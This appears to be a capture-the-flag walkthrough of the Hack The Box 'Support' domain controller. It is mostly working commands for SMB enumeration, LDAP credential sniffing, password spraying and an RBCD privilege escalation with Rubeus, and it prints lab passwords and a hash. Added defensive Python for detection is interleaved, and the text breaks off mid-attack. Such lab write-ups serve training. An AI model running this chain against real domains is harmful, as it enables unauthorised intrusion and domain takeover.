PLEASE CHECK OUT MY NEW SITE WHERE I HOST MY WRITEUPS https://daemon-sec.xyz/post/htb-support
███████╗██╗ ██╗██████╗ ██████╗ ██████╗ ██████╗ ████████╗
██╔════╝██║ ██║██╔══██╗██╔══██╗██╔═══██╗██╔══██╗╚══██╔══╝
███████╗██║ ██║██████╔╝██████╔╝██║ ██║██████╔╝ ██║
╚════██║██║ ██║██╔═══╝ ██╔═══╝ ██║ ██║██╔══██╗ ██║
███████║╚██████╔╝██║ ██║ ╚██████╔╝██║ ██║ ██║
╚══════╝ ╚═════╝ ╚═╝ ╚═╝ ╚═════╝ ╚═╝ ╚═╝ ╚═╝
┌──────────────────────────────────────────────────────────────────────────────┐
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│░ ▄▄▄ ▄████▄ ▄▄▄█████▓ ██▓ ██▒ █▓▓█████ ▓█████▄ ██▓ ██▀███ ░│
│░ ▒████▄ ▒██▀ ▀█ ▓ ██▒ ▓▒▓██▒▓██░ █▒▓█ ▀ ▒██▀ ██▌▓██▒▓██ ▒ ██▒ ░│
│░ ▒██ ▀█▄ ▒▓█ ▄ ▒ ▓██░ ▒░▒██▒ ▓██ █▒░▒███ ░██ █▌▒██▒▓██ ░▄█ ▒ ░│
│░ ░██▄▄▄▄██ ▒▓▓▄ ▄██▒░ ▓██▓ ░ ░██░ ▒██ █░░▒▓█ ▄ ░▓█▄ ▌░██░▒██▀▀█▄ ░│
│░ ▓█ ▓██▒▒ ▓███▀ ░ ▒██▒ ░ ░██░ ▒▀█░ ░▒████▒ ░▒████▓ ░██░░██▓ ▒██▒ ░│
│░ ▒▒ ▓▒█░░ ░▒ ▒ ░ ▒ ░░ ░▓ ░ ▐░ ░░ ▒░ ░ ▒▒▓ ▒ ░▓ ░ ▒▓ ░▒▓░ ░│
│░ ▒ ▒▒ ░ ░ ▒ ░ ▒ ░ ░ ░░ ░ ░ ░ ░ ▒ ▒ ▒ ░ ░▒ ░ ▒░ ░│
│░ ░ ▒ ░ ░ ▒ ░ ░░ ░ ░ ░ ░ ▒ ░ ░░ ░ ░│
│░ ░ ░░ ░ ░ ░ ░ ░ ░ ░ ░ ░│
│░ ░ ░ ░ ░│
│░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░░│
│ E X P L O I T A T I O N // A C T I V E D I R E C T O R Y │
└──────────────────────────────────────────────────────────────────────────────┘
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ATTACK VECTORS ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ [+] SMB Null Session Share Enumeration ║
║ [+] .NET Binary Traffic Analysis (Credential Interception) ║
║ [+] LDAP Attribute Mining (Password in Info Field) ║
║ [+] Password Spraying Attack ║
║ [+] BloodHound Attack Path Analysis ║
║ [+] Resource-Based Constrained Delegation (RBCD) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
- >_ TARGET ACQUISITION
- >_ INITIAL RECONNAISSANCE
- >_ SMB ENUMERATION
- >_ BINARY ANALYSIS // USERINFO.EXE
- >_ CREDENTIAL INTERCEPTION
- >_ FOOTHOLD // LDAP ENUMERATION
- >_ PASSWORD SPRAYING
- >_ BLOODHOUND ANALYSIS
- >_ PRIVILEGE ESCALATION // RBCD ATTACK
- >_ SYSTEM ACCESS OBTAINED
- >_ CREDENTIALS VAULT
- >_ MITRE ATT&CK MAPPING
┌─────────────────────────────────────────────────────────────────────────────────┐
│ T A R G E T I N F I L T R A T I O N P A R A M E T E R S │
├─────────────────────────────────────────────────────────────────────────────────┤
│ IP ADDRESS........: 10.10.11.174 │
│ HOSTNAME..........: DC.support.htb │
│ DOMAIN............: support.htb │
│ OPERATING SYSTEM..: Windows Server 2022 Build 20348 │
│ DIFFICULTY........: Easy │
│ ATTACK SURFACE....: Active Directory Domain Controller │
│ KEY SERVICES......: LDAP, SMB, Kerberos, WinRM │
└─────────────────────────────────────────────────────────────────────────────────┘
The first phase of any engagement involves comprehensive port enumeration. Using RustScan for rapid port discovery combined with Nmap's service detection capabilities provides a complete picture of the target's attack surface.
```
rustscan -a $target --ulimit 5000 -r 1-65535 -- -sC -sV -Pn -oA Support_fullscan
```
Converting results to HTML for easier analysis:
```
xsltproc Support_fullscan.xml -o Support_fullscan.html
```
Figure 1: Nmap scan results revealing all open services on the Domain Controller
┌──────────────────────────────────────────────────────────────────────┐
│ KEY FINDINGS │
├──────────────────────────────────────────────────────────────────────┤
│ [+] Kerberos (88) - Confirms Active Directory environment │
│ [+] LDAP (389/636/3268/3269) - Directory enumeration vectors │
│ [+] SMB (445) - Potential file share access │
│ [+] WinRM (5985) - Remote shell capability if creds obtained │
│ [+] SMB Signing Required - Relay attacks mitigated │
│ [-] No Web Servers - Limits initial attack surface │
└──────────────────────────────────────────────────────────────────────┘
Critical Ports Identified:
| Port | Service | Significance |
|---|---|---|
| 53 | DNS | Domain name resolution for AD |
| 88 | Kerberos | Authentication service - ticket attacks possible |
| 389/636 | LDAP/LDAPS | Directory queries - user/group enumeration |
| 445 | SMB | File shares - potential data exfiltration |
| 5985 | WinRM | Remote PowerShell - shell access with valid creds |
Server Message Block (SMB) shares often contain valuable artifacts left behind by administrators or developers. Testing for null session access (anonymous authentication) is a critical first step.
```
smbclient -L \\\\10.10.11.174\\
```
Figure 2: SMB share enumeration revealing accessible shares including support-tools
The enumeration reveals a non-default share called support-tools which immediately warrants investigation. Standard shares like ADMIN$, C$, and IPC$ require elevated privileges, but custom shares often have relaxed permissions.
```
smbclient \\\\$target\\support-tools
```
Figure 3: Contents of the support-tools share containing various diagnostic utilities
╔══════════════════════════════════════════════════════════════════════════════════╗
║ ARTIFACT DISCOVERED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ FILE: UserInfo.exe.zip ║
║ TYPE: .NET Assembly (Mono/.NET compatible) ║
║ SIZE: 277,499 bytes ║
║ RISK: HIGH - Custom binary with potential hardcoded credentials ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Downloading and extracting the suspicious binary:
```
smb: \> get UserInfo.exe.zip
```
Figure 4: Extracted contents of UserInfo.exe.zip revealing .NET dependencies
Binary identification confirms .NET assembly:
```
file UserInfo.exe
UserInfo.exe: PE32 executable (console) Intel 80386 Mono/.Net assembly, for MS Windows
```
Before interacting with domain services, proper DNS resolution must be configured. NetExec can automatically populate the hosts file with discovered domain information.
```
sudo nxc smb $target --generate-hosts-file /etc/hosts
SMB  10.10.11.174  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None) (Null Auth:True)
```
Since this is a .NET assembly, it can be executed on Linux using Wine or Mono. The binary appears to be a user lookup utility that queries the domain's LDAP directory.
```
Usage: UserInfo.exe [options] [commands]
Options:
  -v|--verbose    Verbose output
Commands:
  find            Find a user
  user            Get information about a user
```
The tool accepts wildcard queries, suggesting it performs LDAP searches against the domain controller. Because the binary has to authenticate to the directory before it can search it, the credentials it binds with travel over the network and can be intercepted.
```
wine UserInfo.exe -v find -first "*"
[*] LDAP query to use: (givenName=*)
[-] Exception: No Such Object
```
The query fails, but the verbose output confirms LDAP communication. The next step involves capturing the network traffic to analyze the authentication mechanism.
When applications authenticate to LDAP, they either use a simple bind, which carries the password in cleartext unless the connection is wrapped in TLS (LDAPS or StartTLS), or a SASL mechanism such as GSSAPI (Kerberos) or NTLM. Capturing this traffic reveals which authentication method is in use.
Starting packet capture on the VPN interface:
```
sudo tshark -i utun4 -w UserInfo.exe.pcap
```
Executing the binary to generate traffic:
```
wine UserInfo.exe find -first "administrator"
```
Analyzing the captured packets:
```
tshark -r UserInfo.exe.pcap
```
Figure 6: Tshark packet capture showing LDAP bind request with "simple" authentication
The capture reveals an LDAP simple bind operation, which transmits credentials in cleartext. Filtering for the bind request exposes the service account password.
```
tshark -r UserInfo.exe.pcap -Y "ldap.simple" -V
```
Figure 7: LDAP simple bind credentials exposed in packet capture
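As an added illustration (this is not code from the writeup), the following Python reconstructs what the `ldap.simple` display filter is matching: it encodes and decodes an LDAPv3 BindRequest (RFC 4511) in BER, shows that a simple bind carries the password as a plain OCTET STRING, and applies the check a network sensor would use to flag such binds on the plaintext port. The bind names, passwords and message IDs in it are constructed placeholders, not values from the box.

```python
"""Decode an LDAPv3 BindRequest (RFC 4511) from BER and flag cleartext simple binds.

Added example, not code from the writeup. It reproduces what the tshark
display filter `ldap.simple` matches: in a simple bind the password travels as
a plain OCTET STRING, so anyone on the path reads it directly. All names,
passwords and message IDs below are constructed placeholders.
"""

BIND_REQUEST = 0x60  # [APPLICATION 0] constructed
SIMPLE_AUTH = 0x80   # [0] IMPLICIT OCTET STRING: the password itself
SASL_AUTH = 0xA3     # [3] SaslCredentials SEQUENCE { mechanism, credentials }


def _ber_len(n: int) -> bytes:
    """Definite-form BER length: short form below 128, long form otherwise."""
    if n < 0x80:
        return bytes([n])
    body = n.to_bytes((n.bit_length() + 7) // 8, "big")
    return bytes([0x80 | len(body)]) + body


def _tlv(tag: int, content: bytes) -> bytes:
    return bytes([tag]) + _ber_len(len(content)) + content


def _read_tlv(buf: bytes, off: int):
    """Return (tag, content, offset_after) for the TLV starting at off."""
    tag, first = buf[off], buf[off + 1]
    off += 2
    if first < 0x80:
        length = first
    else:
        n = first & 0x7F
        length = int.from_bytes(buf[off:off + n], "big")
        off += n
    return tag, buf[off:off + length], off + length


def encode_simple_bind(message_id: int, name: str, password: str) -> bytes:
    """LDAPMessage carrying a BindRequest with simple authentication (message_id < 128)."""
    bind = _tlv(0x02, bytes([3])) + _tlv(0x04, name.encode()) + _tlv(SIMPLE_AUTH, password.encode())
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(BIND_REQUEST, bind))


def encode_sasl_bind(message_id: int, name: str, mechanism: str, creds: bytes = b"") -> bytes:
    """Same shape, but the authentication choice is a SASL mechanism (e.g. GSS-SPNEGO)."""
    sasl = _tlv(0x04, mechanism.encode()) + (_tlv(0x04, creds) if creds else b"")
    bind = _tlv(0x02, bytes([3])) + _tlv(0x04, name.encode()) + _tlv(SASL_AUTH, sasl)
    return _tlv(0x30, _tlv(0x02, bytes([message_id])) + _tlv(BIND_REQUEST, bind))


def parse_bind_request(msg: bytes) -> dict:
    """Walk LDAPMessage -> BindRequest -> authentication choice."""
    tag, body, _ = _read_tlv(msg, 0)
    if tag != 0x30:
        raise ValueError("not an LDAPMessage SEQUENCE")
    _, mid, off = _read_tlv(body, 0)
    tag, bind, _ = _read_tlv(body, off)
    if tag != BIND_REQUEST:
        raise ValueError("not a BindRequest")
    _, version, off = _read_tlv(bind, 0)
    _, name, off = _read_tlv(bind, off)
    auth_tag, auth, _ = _read_tlv(bind, off)
    info = {"message_id": int.from_bytes(mid, "big"), "version": version[0],
            "name": name.decode("utf-8", "replace")}
    if auth_tag == SIMPLE_AUTH:
        info["auth"] = "simple"
        info["password"] = auth.decode("utf-8", "replace")  # cleartext on the wire
    elif auth_tag == SASL_AUTH:
        _, mech, _ = _read_tlv(auth, 0)
        info["auth"] = "sasl"
        info["mechanism"] = mech.decode()
    else:
        info["auth"] = "unknown(0x%02x)" % auth_tag
    return info


def audit_bind(msg: bytes, dst_port: int):
    """Finding for a credentialed simple bind on a non-TLS port, else None.

    An empty name with an empty password is an anonymous bind and carries no
    secret, so it is not reported; a port-636 (LDAPS) bind is wrapped in TLS
    and would not be readable in a capture in the first place.
    """
    info = parse_bind_request(msg)
    if info["auth"] == "simple" and info["name"] and dst_port != 636:
        return "cleartext simple bind by %r on port %d" % (info["name"], dst_port)
    return None


if __name__ == "__main__":
    sample = encode_simple_bind(1, "support\\ldap", "Example-Pass1")  # constructed
    print(parse_bind_request(sample))
    print(audit_bind(sample, 389))
```

The same condition can be surfaced on the domain controller without a packet capture: with the "16 LDAP Interface Events" diagnostic level raised, the Directory Service log records Event ID 2889 for every unsigned simple bind, including the client address and the account name that bound.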
╔══════════════════════════════════════════════════════════════════════════════════╗
║ CREDENTIAL INTERCEPTED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ BIND DN....: support\ldap ║
║ PASSWORD...: nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz ║
║ AUTH TYPE..: Simple Bind (Cleartext) ║
║ PROTOCOL...: LDAP (Port 389, Unencrypted) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Before proceeding with enumeration, the captured credentials must be validated against the domain.
```
nxc smb support.htb -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz'
SMB  10.10.11.174  445  DC  [*] Windows Server 2022 Build 20348 x64 (name:DC) (domain:support.htb) (signing:True) (SMBv1:None)
SMB  10.10.11.174  445  DC  [+] support.htb\ldap:nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz
```
The [+] indicator confirms successful authentication. These credentials can now be leveraged for deep LDAP enumeration.
BloodHound is an essential tool for mapping Active Directory attack paths. It collects information about users, groups, computers, sessions, and ACLs to identify privilege escalation routes.
```
bloodhound-ce-python -c all -u ldap -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
  -d support.htb -ns $target --zip
```
| Flag | Purpose |
|---|---|
| -c all | Collect all data types (users, groups, computers, sessions, ACLs) |
| -u ldap | Username for LDAP authentication |
| -p '...' | Password (note: special characters require quoting) |
| -d support.htb | Target domain |
| -ns $target | Nameserver IP for DNS resolution |
| --zip | Compress output for BloodHound import |
Figure 8: BloodHound-CE data collection successfully enumerating 21 users, 53 groups, and more
Administrators sometimes store sensitive information in LDAP attributes like description, info, or comment. A comprehensive LDAP dump can reveal these misconfigurations.
```
ldapsearch -LLL -x -H ldap://support.htb \
  -D 'ldap@support.htb' \
  -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
  -b "DC=support,DC=htb"
```
This command dumps every object in the domain directory. To find passwords hidden in attributes, filter the output:
```
ldapsearch -LLL -x -H ldap://support.htb \
  -D 'ldap@support.htb' \
  -w 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
  -b "DC=support,DC=htb" | grep -i "info" -B 10
```
Figure 9: LDAP search reveals password stored in the info attribute of user "support"
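Grepping for one attribute name works on a small domain, but an audit of the same `ldapsearch -LLL` output should check every entry's free-text attributes and cope with LDIF's own quirks. The following Python is an added example (not code from the writeup): it parses LDIF, including folded continuation lines and base64 `attr::` values, and reports password-looking values in the info, description and comment attributes. The LDIF embedded in it is constructed sample data, not the box's directory.

```python
"""Audit an LDIF export for password-like values in free-text attributes.

Added example, not code from the writeup. It takes the `ldapsearch -LLL`
output produced above and checks the info, description and comment
attributes of every entry instead of grepping for a single attribute name.
The LDIF below is constructed sample data, not the box's directory.
"""
import base64
import re

WATCHED = ("info", "description", "comment")
# Heuristics: an explicit hint an admin left ("password: ...", "pwd=", "creds"),
# or a long run of non-space characters mixing letters and digits.
HINT = re.compile(r"(pass(word|wd)?|pwd|creds?)\s*[:=]?\s*\S", re.I)
TOKEN = re.compile(r"(?=\S*[A-Za-z])(?=\S*\d)\S{10,}")


def unfold(text: str) -> list:
    """Join LDIF continuation lines (a leading space) onto the line before them."""
    lines = []
    for raw in text.splitlines():
        if raw.startswith(" ") and lines:
            lines[-1] += raw[1:]
        else:
            lines.append(raw)
    return lines


def parse_ldif(text: str) -> list:
    """Return one {attribute: [values]} dict per entry; attribute names are lower-cased."""
    entries, current = [], {}
    for line in unfold(text) + [""]:
        if line == "":                      # blank line terminates an entry
            if current:
                entries.append(current)
                current = {}
            continue
        if line.startswith("#") or ":" not in line:
            continue
        attr, _, rest = line.partition(":")
        if rest.startswith(":"):            # "attr:: <base64>" form
            value = base64.b64decode(rest[1:].strip()).decode("utf-8", "replace")
        else:
            value = rest.strip()
        current.setdefault(attr.lower(), []).append(value)
    return entries


def looks_like_secret(value: str) -> bool:
    return bool(HINT.search(value) or TOKEN.search(value))


def find_exposed_attributes(text: str) -> list:
    """(dn, attribute, value) for every watched attribute holding a secret-looking value."""
    findings = []
    for entry in parse_ldif(text):
        dn = entry.get("dn", ["?"])[0]
        for attr in WATCHED:
            for value in entry.get(attr, []):
                if looks_like_secret(value):
                    findings.append((dn, attr, value))
    return findings


# Constructed sample: a folded info value, a harmless description, and a
# base64-encoded comment (ldapsearch emits that form for values with non-ASCII
# or leading spaces; here it simply exercises the decode path).
SAMPLE_LDIF = """\
dn: CN=support,CN=Users,DC=example,DC=test
sAMAccountName: support
description: Shared support account
info: Winter-Frost83quietly12
 Harbor

dn: CN=alice,CN=Users,DC=example,DC=test
sAMAccountName: alice
description: Finance team lead

dn: CN=svc-backup,CN=Users,DC=example,DC=test
sAMAccountName: svc-backup
comment:: cGFzc3dvcmQ6IEJhY2t1cCEyMDI2
"""

if __name__ == "__main__":
    for dn, attr, value in find_exposed_attributes(SAMPLE_LDIF):
        print("%s  %s=%r" % (dn, attr, value))
```

Run it with `ldapsearch -LLL ... > dump.ldif` and `find_exposed_attributes(open("dump.ldif").read())`; the heuristics are deliberately loose, since a false positive costs a glance while a missed attribute costs a domain.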
╔══════════════════════════════════════════════════════════════════════════════════╗
║ CREDENTIAL DISCOVERED IN LDAP ATTRIBUTE ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USER DN.....: CN=support,CN=Users,DC=support,DC=htb ║
║ ATTRIBUTE...: info ║
║ VALUE.......: Ironside47pleasure40Watchful ║
║ RISK........: CRITICAL - Password stored in cleartext LDAP attribute ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Before confirming which account uses the discovered password, extract a complete list of domain users.
```
nxc ldap support.htb -u 'ldap' -p 'nvEfEK16^1aM4$e7AclUf8x$tRWxPWO1%lmz' \
  --users --users-export users.txt
```
Password spraying tests a single password against multiple accounts. Because each account receives only one attempt, the technique stays below lockout thresholds while identifying where the discovered password is reused.
```
nxc smb support.htb -u users.txt -p 'Ironside47pleasure40Watchful' --continue-on-success
```
Figure 11: Password spray identifies "support" as the account using the discovered password
Alternative validation using Kerbrute:
```
kerbrute -domain support.htb -dc-ip $target -users users.txt \
  -password Ironside47pleasure40Watchful
```
Figure 12: Kerbrute validates the credential against Kerberos authentication
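Seen from the domain controller, a spray like the two runs above is the mirror image of a brute force: one source, many distinct accounts, one failure each, usually followed by a single success. The Python below is an added example (not code from the writeup) of that detection logic run over constructed event records in a simplified CSV layout: Kerberos pre-authentication failures (Event ID 4771, failure code 0x18) and TGT requests (4768). The timestamps, account names and source addresses are all made up.

```python
"""Detect a password spray from Kerberos pre-authentication failures.

Added example, not code from the writeup. A spray sends one password to many
accounts, so on the DC it appears as many distinct usernames failing pre-auth
(Event ID 4771, status 0x18 = wrong password) from one source in a short
window, usually followed by a single success (4768). The event lines below
are constructed samples in a simplified CSV layout, not real DC log output.
"""
from collections import defaultdict
from datetime import datetime, timedelta

SAMPLE_EVENTS = """\
time,event_id,account,source_ip,status
2026-01-09T10:00:01,4771,alice,10.10.14.5,0x18
2026-01-09T10:00:01,4771,bob,10.10.14.5,0x18
2026-01-09T10:00:02,4771,ldap,10.10.14.5,0x18
2026-01-09T10:00:02,4768,support,10.10.14.5,0x0
2026-01-09T10:00:03,4771,dave,10.10.14.5,0x18
2026-01-09T10:00:03,4771,erin,10.10.14.5,0x18
2026-01-09T10:00:04,4771,frank,10.10.14.5,0x18
2026-01-09T10:01:00,4771,carol,10.10.14.9,0x18
2026-01-09T10:01:10,4771,carol,10.10.14.9,0x18
2026-01-09T10:01:20,4771,carol,10.10.14.9,0x18
2026-01-09T10:01:30,4771,carol,10.10.14.9,0x18
2026-01-09T10:01:40,4771,carol,10.10.14.9,0x18
2026-01-09T10:01:50,4771,carol,10.10.14.9,0x18
2026-01-09T11:30:00,4768,alice,10.10.14.20,0x0
"""


def parse_events(text: str) -> list:
    """CSV with a header row -> list of dicts; time parsed, event_id as int."""
    lines = text.strip().splitlines()
    header = lines[0].split(",")
    rows = []
    for line in lines[1:]:
        rec = dict(zip(header, line.split(",")))
        rec["time"] = datetime.fromisoformat(rec["time"])
        rec["event_id"] = int(rec["event_id"])
        rows.append(rec)
    return rows


def detect_spray(events: list, window: timedelta = timedelta(minutes=5), min_accounts: int = 5) -> list:
    """One alert per source IP whose distinct failed accounts within `window` reach min_accounts.

    The distinct-account threshold is what separates a spray from a single
    account being guessed repeatedly (carol from 10.10.14.9 above): six
    failures against one name never trip it.
    """
    by_source = defaultdict(list)
    for e in sorted(events, key=lambda e: e["time"]):
        by_source[e["source_ip"]].append(e)

    alerts = []
    for src, evs in by_source.items():
        fails = [e for e in evs if e["event_id"] == 4771 and e["status"] == "0x18"]
        for i, start in enumerate(fails):
            burst = [e for e in fails[i:] if e["time"] - start["time"] <= window]
            accounts = {e["account"] for e in burst}
            if len(accounts) < min_accounts:
                continue
            # A 4768 from the same source during the burst is the account whose
            # password matched: the one to reset first.
            end = burst[-1]["time"] + window
            successes = {e["account"] for e in evs
                         if e["event_id"] == 4768 and start["time"] <= e["time"] <= end}
            alerts.append({"source_ip": src, "start": start["time"],
                           "sprayed_accounts": len(accounts),
                           "likely_valid": sorted(successes)})
            break  # one alert per source is enough for triage
    return alerts


if __name__ == "__main__":
    for alert in detect_spray(parse_events(SAMPLE_EVENTS)):
        print(alert)
```

The NetExec run on the page sprays over SMB rather than Kerberos, so on a real DC the equivalent signal is Event ID 4625 (or 4776 for NTLM validation) with the same many-accounts-one-source shape; the grouping logic is unchanged, only the event ID and status field differ.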
╔══════════════════════════════════════════════════════════════════════════════════╗
║ VALID CREDENTIAL CONFIRMED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ USERNAME: support ║
║ PASSWORD: Ironside47pleasure40Watchful ║
║ ACCESS..: Remote Management Users (WinRM enabled) ║
╚══════════════════════════════════════════════════════════════════════════════════╝
With valid credentials for the support user, mark this principal as "Owned" in BloodHound to analyze attack paths from this position.
Figure 13: Marking the support user as owned in BloodHound-CE
BloodHound reveals that the support user is a member of Shared Support Accounts, which has GenericAll permissions over the Domain Controller computer object. This permission allows modification of critical attributes including Resource-Based Constrained Delegation (RBCD).
Figure 14: Windows-based RBCD abuse path via PowerMad and Rubeus
┌──────────────────────────────────────────────────────────────────────┐
│ ATTACK PATH IDENTIFIED │
├──────────────────────────────────────────────────────────────────────┤
│ support@SUPPORT.HTB │
│ │ │
│ └──[MemberOf]──> SHARED SUPPORT ACCOUNTS@SUPPORT.HTB │
│ │ │
│ └──[GenericAll]──> DC.SUPPORT.HTB │
│ │ │
│ └──> RBCD Abuse │
└──────────────────────────────────────────────────────────────────────┘
RBCD allows a computer to specify which accounts can impersonate users to it via Kerberos delegation. With GenericAll over a computer object, an attacker can:
- Create a new machine account (or use an existing controlled account)
- Modify the target's msDS-AllowedToActOnBehalfOfOtherIdentity attribute
- Request a service ticket impersonating any user to the target
```
evil-winrm -i $target -u support -p Ironside47pleasure40Watchful
```
Active Directory allows regular users to create up to 10 machine accounts by default. This is controlled by the ms-DS-MachineAccountQuota attribute.
```
Get-ADObject -Identity ((Get-ADDomain).distinguishedname) -Properties ms-DS-MachineAccountQuota
```
Figure 16: Machine account quota check shows default value of 10
Before configuring delegation, confirm the target attribute is not already set.
```
Get-DomainComputer DC | select name, msds-allowedtoactonbehalfofotheridentity
```
Upload the tooling through the Evil-WinRM session and dot-source the PowerShell modules:
```
upload PowerView.ps1
. ./PowerView.ps1
upload Powermad.ps1
. ./Powermad.ps1
upload Rubeus.exe
```
Using PowerMad, create a new machine account that will be granted delegation privileges.
```
New-MachineAccount -MachineAccount FAKE-COMP02 -Password $(ConvertTo-SecureString 'Password123' -AsPlainText -Force)
```
Verify creation:
```
Get-ADComputer -identity FAKE-COMP02
```
Figure 18: Fake computer account successfully created in Active Directory
Set the Domain Controller to trust our fake computer for delegation.
```
Set-ADComputer -Identity DC -PrincipalsAllowedToDelegateToAccount FAKE-COMP02$
```
Verify configuration:
```
Get-ADComputer -Identity DC -Properties PrincipalsAllowedToDelegateToAccount
```
Confirm via PowerView:
```
Get-DomainComputer DC | select msds-allowedtoactonbehalfofotheridentity
```
Figure 20: RBCD attribute populated with security descriptor
The attribute holds a binary security descriptor; decode it to see which SID was granted delegation rights:
```
# Raw attribute bytes, read via PowerView (this line supplies the $RawBytes the decode below needs)
$RawBytes = Get-DomainComputer DC -Properties 'msds-allowedtoactonbehalfofotheridentity' | Select-Object -ExpandProperty msds-allowedtoactonbehalfofotheridentity
$Descriptor = New-Object Security.AccessControl.RawSecurityDescriptor -ArgumentList $RawBytes, 0
$Descriptor
$Descriptor.DiscretionaryAcl
```
Figure 21: Security descriptor confirms FAKE-COMP02's SID has delegation rights
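The RawSecurityDescriptor call above does the decode in .NET on the host. As an added example (not code from the writeup), the Python below performs the same decode of the self-relative security descriptor stored in msDS-AllowedToActOnBehalfOfOtherIdentity and adds the diff a change-monitoring rule needs, so a defender can run it over attribute values pulled from a directory backup or an audit feed. Every SID in it is a constructed placeholder; the builder exists only to produce sample descriptors for the parser.

```python
"""Decode msDS-AllowedToActOnBehalfOfOtherIdentity and diff it for monitoring.

Added example, not code from the writeup. The attribute is a self-relative
NT security descriptor; the SIDs in its DACL's ACCESS_ALLOWED ACEs are the
principals permitted to delegate to the computer. This is the decode the
RawSecurityDescriptor call above performs in .NET, written in Python so a
defender can run it over attribute values from a backup or a change feed.
All SIDs below are constructed placeholders.
"""
import struct

SE_DACL_PRESENT = 0x0004
SE_SELF_RELATIVE = 0x8000
ACCESS_ALLOWED_ACE_TYPE = 0x00
ACL_REVISION_DS = 0x04
GENERIC_ALL_DS = 0x000F01FF  # the mask Set-ADComputer writes for delegation principals


def sid_to_bytes(sid: str) -> bytes:
    """S-1-<authority>-<sub>-... -> binary SID (revision, count, 48-bit authority, LE subauthorities)."""
    parts = sid.split("-")
    if parts[0] != "S" or parts[1] != "1":
        raise ValueError("not a SID string: %r" % sid)
    authority = int(parts[2])
    subs = [int(p) for p in parts[3:]]
    return bytes([1, len(subs)]) + authority.to_bytes(6, "big") + struct.pack("<%dI" % len(subs), *subs)


def bytes_to_sid(buf: bytes, off: int):
    """Return (sid_string, byte_length) for the binary SID at off."""
    revision, count = buf[off], buf[off + 1]
    authority = int.from_bytes(buf[off + 2:off + 8], "big")
    subs = struct.unpack_from("<%dI" % count, buf, off + 8)
    return "S-%d-%d-%s" % (revision, authority, "-".join(str(s) for s in subs)), 8 + 4 * count


def build_rbcd_descriptor(sids: list, owner: str = "S-1-5-32-544") -> bytes:
    """Sample self-relative SD: 20-byte header, owner SID, then a DACL with one allow ACE per SID."""
    aces = b""
    for sid in sids:
        sid_b = sid_to_bytes(sid)
        aces += struct.pack("<BBHI", ACCESS_ALLOWED_ACE_TYPE, 0, 8 + len(sid_b), GENERIC_ALL_DS) + sid_b
    acl = struct.pack("<BBHHH", ACL_REVISION_DS, 0, 8 + len(aces), len(sids), 0) + aces
    owner_b = sid_to_bytes(owner)
    header = struct.pack("<BBHIIII", 1, 0, SE_SELF_RELATIVE | SE_DACL_PRESENT,
                         20, 0, 0, 20 + len(owner_b))   # owner, group, SACL, DACL offsets
    return header + owner_b + acl


def allowed_to_delegate(sd: bytes) -> list:
    """SIDs granted by ACCESS_ALLOWED ACEs in the DACL (empty list if no DACL is present)."""
    _, _, control, _, _, _, off_dacl = struct.unpack_from("<BBHIIII", sd, 0)
    if not control & SE_DACL_PRESENT or off_dacl == 0:
        return []
    _, _, _, ace_count, _ = struct.unpack_from("<BBHHH", sd, off_dacl)
    off = off_dacl + 8
    sids = []
    for _ in range(ace_count):
        ace_type, _, ace_size = struct.unpack_from("<BBH", sd, off)
        if ace_type == ACCESS_ALLOWED_ACE_TYPE:
            sid, _ = bytes_to_sid(sd, off + 8)   # mask occupies bytes 4..7 of the ACE
            sids.append(sid)
        off += ace_size                          # skip ACE types this decoder does not model
    return sids


def delegation_change(before: bytes, after: bytes) -> dict:
    """What a monitoring rule should alert on: SIDs added to or removed from the attribute."""
    old = set(allowed_to_delegate(before)) if before else set()
    new = set(allowed_to_delegate(after)) if after else set()
    return {"added": sorted(new - old), "removed": sorted(old - new)}


if __name__ == "__main__":
    fake_sid = "S-1-5-21-1111111111-2222222222-3333333333-1105"  # constructed
    sd = build_rbcd_descriptor([fake_sid])
    print(allowed_to_delegate(sd))
    print(delegation_change(b"", sd))
```

In production the `before`/`after` values come from Event ID 5136 (directory object modified), which carries the attribute's old and new value once "Audit Directory Service Changes" and a SACL on computer objects are in place; an `added` entry on a domain controller's object is the alert the recommendations at the end of this writeup ask for.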
Rubeus requires the machine account's password hash for S4U operations.
```
.\Rubeus.exe hash /password:Password123 /user:FAKE-COMP02$ /domain:support.htb
```
Figure 22: Rubeus generates RC4 HMAC hash for the fake computer account
╔══════════════════════════════════════════════════════════════════════════════════╗
║ HASH GENERATED ║
╠══════════════════════════════════════════════════════════════════════════════════╣
║ ACCOUNT...: FAKE-COMP02$ ║
║ RC4_HMAC..: 58A478135A93AC3BF058A5EA0E8FDB71 ║
╚══════════════════════════════════════════════════════════════════════════════════╝
Execute the S4U (Service for User) attack to obtain a ticket for Administrator.
```
.\Rubeus.exe s4u /user:FAKE-COMP02$ /rc4:58A478135A93AC3BF058A5EA0E8FDB71 /impersonateuser:Administrator /msdsspn:cifs/dc.support.htb /domain:support.htb /ptt
```
Rubeus Output:
```
   ______        _
  (_____ \      | |
   _____) )_   _| |__  _____ _   _  ___
  |  __  /| | | |  _ \| ___ | | | |/___)
  | |  \ \| |_| | |_) ) ____| |_| |___ |
  |_|   |_|____/|____/|_____)____/(___/

  v2.3.3

[*] Action: S4U
[*] Using rc4_hmac hash: 58A478135A93AC3BF058A5EA0E8FDB71
